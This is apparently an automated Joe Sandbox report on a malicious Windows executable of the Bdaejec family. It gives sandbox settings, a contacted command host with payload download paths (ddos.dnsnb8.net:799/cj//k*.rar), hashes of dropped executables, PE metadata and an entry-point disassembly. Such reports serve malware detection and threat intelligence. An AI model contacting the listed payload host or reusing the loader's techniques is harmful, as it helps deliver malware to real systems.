      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      44.221.84.105
      ddos.dnsnb8.netUnited States
      14618AMAZON-AESUSfalse
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1480645
      Start date and time:2024-07-24 22:27:24 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 6m 32s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name:Run with higher sleep bypass
      Number of analysed new started processes analysed:23
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:biKy3nZEyJ.exe
      renamed because original name is a hash value
      Original Sample Name:98DC44E47B06318EBD73414912CD60F5FF71B3FE172476D353B4DDA39C7DC327.exe
      Detection:MAL
      Classification:mal81.spre.troj.evad.winEXE@6/13@1/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 56%
      • Number of executed functions: 15
      • Number of non-executed functions: 28
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 13.89.179.12
      • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: biKy3nZEyJ.exe
      No simulations
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      44.221.84.1059310DAF6D10F4FBFAF390E74BCF1C4D9ACC023D7DB3E26030F8772528572A22A.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k2.rar
      942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k2.rar
      998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      987123[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • ddos.dnsnb8.net:799/cj//k1.rar
      96ee8edc[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exeGet hashmaliciousBdaejec, Oski Stealer, VidarBrowse
      • ddos.dnsnb8.net:799/cj//k1.rar
      942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejec, SalityBrowse
      • ddos.dnsnb8.net:799/cj//k3.rar
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k3.rar
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ddos.dnsnb8.net9310DAF6D10F4FBFAF390E74BCF1C4D9ACC023D7DB3E26030F8772528572A22A.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      987123[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      96ee8edc[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exeGet hashmaliciousBdaejec, Oski Stealer, VidarBrowse
      • 44.221.84.105
      942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejec, SalityBrowse
      • 44.221.84.105
      9608e7d593a0671671e3b7e23d1b1fcfe49a5f84da9d2e0c5560d63b091acd83.exeGet hashmaliciousBdaejec, GCleaner, NymaimBrowse
      • 44.221.84.105
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      AMAZON-AESUS9310DAF6D10F4FBFAF390E74BCF1C4D9ACC023D7DB3E26030F8772528572A22A.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      987123[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      96ee8edc[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exeGet hashmaliciousBdaejec, Oski Stealer, VidarBrowse
      • 44.221.84.105
      942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejec, SalityBrowse
      • 44.221.84.105
      Transaction record 5445-97660.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
      • 3.227.160.36
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Users\user\AppData\Local\Temp\TJytnf.exe#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeGet hashmaliciousBdaejec, SalityBrowse
        a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
          1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
            log1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
              log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
                2.exeGet hashmaliciousBdaejecBrowse
                  gracNYJFpD.exeGet hashmaliciousBdaejec, GhostRat, Nitol, Young LotusBrowse
                    xpKZwKFN9W.exeGet hashmaliciousBdaejecBrowse
                      LVF7FM9Z4I.exeGet hashmaliciousBdaejecBrowse
                        Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):19456
                        Entropy (8bit):6.590345709749569
                        Encrypted:false
                        SSDEEP:384:1FlSRXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:ovQGPL4vzZq2o9W7GsxBbPr
                        MD5:C4DFD2EBC61A0412FC3F2A11D18EE0E0
                        SHA1:2F2AD0579273DC9CA80F4DB84D357386D32CB6CF
                        SHA-256:FA0CA1AECD1F355F6AF5BF54621B2A1685A74777B13B305E6313246451B6E959
                        SHA-512:07FD8802D1DAEC1256A821F6E19299579CBEC4F87CED8354B85EF55084F12DEBDCBBE2A6FBF2CF48EEBB552BA3416BF3F456F59C15EA6A2B5338E0BFEF8C3C24
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                        Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):2389504
                        Entropy (8bit):6.731347051527704
                        Encrypted:false
                        SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                        MD5:9EBB63361BCEAA83ED9ABFD842E95B39
                        SHA1:46E763A29988F77E4EDE9059FF2132A2A49E0F51
                        SHA-256:1C463DD42C56E1E2E37928B12878BAF54FFFC78B49EF00DABCFC115FF4B7C0FC
                        SHA-512:ED1465AC862AE80C429814D6E00360B7DC4E9004BA3C27717E00E1623DF8DF9E3D36D11C4819BC54B553F568D7222544E7F70E5ED39E7B47EAD90281445A0C76
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):31744
                        Entropy (8bit):6.366508905276035
                        Encrypted:false
                        SSDEEP:768:uWQ3655Kv1X/qY1MSdh8QGPL4vzZq2o9W7GsxBbPr:uHqaNrFdhfGCq2iW7z
                        MD5:DAA82762959307F04406C76949277F0E
                        SHA1:4B436F3048992376CAAE23C534CE6E65CA58647C
                        SHA-256:01249BABA041A58CCEAA9642C97C6B0AA2F8F96709DA282C1A374F97D7B852D7
                        SHA-512:87FE5F74ECDD9AF90E325558016635783A63B4EE9DF6C232452AE440E8A6566C53343C4A56671F442B8B9DCD7D24EB42C4CFCA1D427D05202ECCFF56BBD11B86
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.9888504021786939
                        Encrypted:false
                        SSDEEP:96:VlFPu3jJsmhnc7afzQXIDcQwc6XcEdcw3oYI+HbHg/5ksS/YyNl1zWDUTAH+DOy3:f9ejJi0OT3kYJjk/JFzuiF5Z24IO8gP
                        MD5:61F02DB797AC30F2E591AF4812559EC9
                        SHA1:0603FD534F9D73B7AFBB21A2E3D729761EF126F8
                        SHA-256:B100722E2E5DEA4A8AA72A9E69B4DB8781459423BECB2E9E2BCB74A9E4813683
                        SHA-512:81780C7293A4F5D5C8001EF85F16A6FFE16C9B6ABA17BBB888F0C34314EB2CF585255CDB2B46474D5BBA026D500E9ADA49C8A34628B551E066D331A5D66AAC9C
                        Malicious:false
                        Reputation:low
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.2.6.5.1.1.4.1.5.0.4.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.2.6.5.1.2.8.2.1.2.9.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.b.e.8.0.c.0.-.2.d.6.f.-.4.6.0.e.-.b.6.6.d.-.8.9.c.9.b.7.c.0.a.c.b.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.7.4.1.a.f.3.-.9.5.f.2.-.4.6.c.2.-.a.4.f.6.-.2.2.8.a.e.4.9.5.6.3.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.J.y.t.n.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.e.4.-.0.0.0.1.-.0.0.1.4.-.b.5.c.7.-.b.6.0.5.0.8.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.b.0.d.5.c.4.5.b.d.c.5.1.c.b.0.5.a.f.e.e.1.8.2.0.9.f.4.8.8.2.5.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.T.J.y.t.n.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Wed Jul 24 20:28:32 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):154494
                        Entropy (8bit):1.8707255507294243
                        Encrypted:false
                        SSDEEP:768:kFVSkMB9phc/DfqeX53Felcf6I0xHxvZ6jkpEf9lv7lu71:Sfpb53R0xZZQkpEf9lv7lu71
                        MD5:390D13265A1DA1452B1CEBA4245F813E
                        SHA1:E669B17BAEDA935D54773265F609E087CA9EA484
                        SHA-256:168ED52C7F702DB5C3EB67822D2D0AE1478A0AD28E76F509BC1E2F071E7C5EAA
                        SHA-512:A2BB025FA8E3C89D796E6D1A4009C519A4C5C72123E50B9FA7371EE49F804C7C57D03848389FA45056F77F92417D870CFE4A2CBAF5B2175348C65F3656633489
                        Malicious:false
                        Reputation:low
                        Preview:MDMP..a..... ........c.f............D...............X.......<.... ......4....N..........`.......8...........T...........x=..............8!..........$#..............................................................................eJ.......#......GenuineIntel............T............c.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):6274
                        Entropy (8bit):3.721825334797743
                        Encrypted:false
                        SSDEEP:96:RSIU6o7wVetbZk6aMUkYmaXz5aMQUM89bW0sfjym:R6l7wVeJZk6ZYmWpDM89bW0sfjym
                        MD5:56AA68F49D02FED59A6EB4C0CF210622
                        SHA1:59CD1EB92C580AAD101DAD05F108DD915903CB2C
                        SHA-256:93BF3F94B72A0E3CD7CE174058E60A9DFF780F9845EC0717125559CBD765126E
                        SHA-512:00796FE17D29A50C59E88D1E9A65769155D7CCDAAC72190FFA2D2C59BDDFE583A76570AA8D77EEAF677F5E42F401EC5BD830A6B82D06F3F0D430562F21832877
                        Malicious:false
                        Reputation:low
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.4.4.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4551
                        Entropy (8bit):4.445432678988999
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsLJg77aI95uWpW8VYbYm8M4JYgFY+q8qIbPM2gDsJd:uIjflI7nP7V/JgAbxgYJd
                        MD5:675A5A821D56C82E3D5E2BF6A2759E80
                        SHA1:6DD2C6677F80AA36A48E159071D161F8C6043851
                        SHA-256:B67BEFDD846038E22DF3D0E2D1B87FA94A3E5A55A3F89E81A7A0C5C5CAA22E94
                        SHA-512:2D3FAEEA12AB53DD37211648D9B225FB0AB4D10A6E79ED6E3AA2A87E3DFBB942EF759982B22C6CC77882680AD7799001C63777AE6C626689E06786F118601B32
                        Malicious:false
                        Reputation:low
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425491" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):4
                        Entropy (8bit):1.5
                        Encrypted:false
                        SSDEEP:3:Nv:9
                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:foo.
                        Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):4
                        Entropy (8bit):1.5
                        Encrypted:false
                        SSDEEP:3:Nv:9
                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                        Malicious:false
                        Preview:foo.
                        Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):4
                        Entropy (8bit):1.5
                        Encrypted:false
                        SSDEEP:3:Nv:9
                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                        Malicious:false
                        Preview:foo.
                        Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        File Type:ASCII text
                        Category:modified
                        Size (bytes):4
                        Entropy (8bit):1.5
                        Encrypted:false
                        SSDEEP:3:Nv:9
                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                        Malicious:false
                        Preview:foo.
                        Process:C:\Users\user\Desktop\biKy3nZEyJ.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:modified
                        Size (bytes):15872
                        Entropy (8bit):7.031113762428177
                        Encrypted:false
                        SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                        MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                        SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                        SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                        SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Joe Sandbox View:
                        • Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse
                        • Filename: a4#Uff09.exe, Detection: malicious, Browse
                        • Filename: 1.0.0.2.exe, Detection: malicious, Browse
                        • Filename: log1.exe, Detection: malicious, Browse
                        • Filename: log2.exe, Detection: malicious, Browse
                        • Filename: 2.exe, Detection: malicious, Browse
                        • Filename: gracNYJFpD.exe, Detection: malicious, Browse
                        • Filename: xpKZwKFN9W.exe, Detection: malicious, Browse
                        • Filename: LVF7FM9Z4I.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.417070789869389
                        Encrypted:false
                        SSDEEP:6144:ocifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNZ5+:di58oSWIZBk2MM6AFBzo
                        MD5:970C07DB2E2AE1A080F95E9B34E97A7A
                        SHA1:2D0C50C9C85938F0F9A37926EB3DC32865BEB71E
                        SHA-256:171DB4114CC7AC2A8F8D89A29FFE13ED864F7DFFE6BE396B34B4F2E23F7A9581
                        SHA-512:4A1C6BAB1F52DAA841D5E10417A4E5AC1D7A4AC74C7809E699DD9DBC44549B6D8150D6271C8C81E48E66075DC2EBE9A715252CA87AF418617A5B62B5087FDCA1
                        Malicious:false
                        Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..................................................................................................................................................................................................................................................................................................................................................@..3........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.46807306180755
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 98.81%
                        • Windows ActiveX control (116523/4) 1.15%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:biKy3nZEyJ.exe
                        File size:3'101'704 bytes
                        MD5:6963bb0311ded02ba57657ba4a61d427
                        SHA1:777ed3376f2b380fef0658e6b1ab4a90e4dca901
                        SHA256:98dc44e47b06318ebd73414912cd60f5ff71b3fe172476d353b4dda39c7dc327
                        SHA512:62f7cea98e3d9855333934fad2b5d3d2681109d3e095022b444e6eba284e33dba1502f050cc95adbcbe475bff8fccf2e64b59110504c4f8b23441079bfd90e06
                        SSDEEP:49152:WbJ8ShfSifOsD+Q/Hg1Pi+zrEREFo8IEoypFfbVquZLlrlB6ezwA1UCKG+mipmAQ:0haIO2+Q/A1lzrqYo8I2TVquZLF8Cimr
                        TLSH:60E590237AF1847AC6630332897D7779A1EDEA701936E283679C1F2D1D701D35A386A3
                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......4...p...p...p....e0.q...}...$...}. ._...}.......6...1...p...i....e1.}....e/.r....e4.S...p...{...s...u...}.$.q...p.h.q...s.!.q..
                        Icon Hash:03d4c69ec892d0cc
                        Entrypoint:0x740000
                        Entrypoint Section:A#uq
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x547CD530 [Mon Dec 1 20:53:04 2014 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:fc8b72cd3830d0f6a9c801b4385e1454
                        Instruction
                        push ebp
                        mov ebp, esp
                        sub esp, 0000016Ch
                        xor eax, eax
                        push ebx
                        push esi
                        push edi
                        mov dword ptr [ebp-24h], eax
                        mov dword ptr [ebp-10h], eax
                        mov dword ptr [ebp-14h], eax
                        mov dword ptr [ebp-08h], eax
                        mov dword ptr [ebp-0Ch], eax
                        mov dword ptr [ebp-20h], eax
                        mov dword ptr [ebp-18h], eax
                        mov dword ptr [ebp-48h], 74794A54h
                        mov dword ptr [ebp-44h], 652E666Eh
                        mov dword ptr [ebp-40h], 00006578h
                        mov dword ptr [ebp-3Ch], 00000000h
                        call 00007FFBA8B95D15h
                        pop eax
                        add eax, 00000225h
                        mov dword ptr [ebp-04h], eax
                        mov eax, dword ptr fs:[00000030h]
                        mov dword ptr [ebp-28h], eax
                        mov eax, dword ptr [ebp-04h]
                        mov dword ptr [eax], E904C483h
                        mov eax, dword ptr [ebp-04h]
                        mov dword ptr [eax+04h], FFEC74CCh
                        mov eax, dword ptr [ebp-28h]
                        mov eax, dword ptr [eax+0Ch]
                        mov eax, dword ptr [eax+1Ch]
                        mov eax, dword ptr [eax]
                        mov eax, dword ptr [eax+08h]
                        mov ecx, dword ptr [eax+3Ch]
                        mov ecx, dword ptr [ecx+eax+78h]
                        add ecx, eax
                        mov edi, dword ptr [ecx+1Ch]
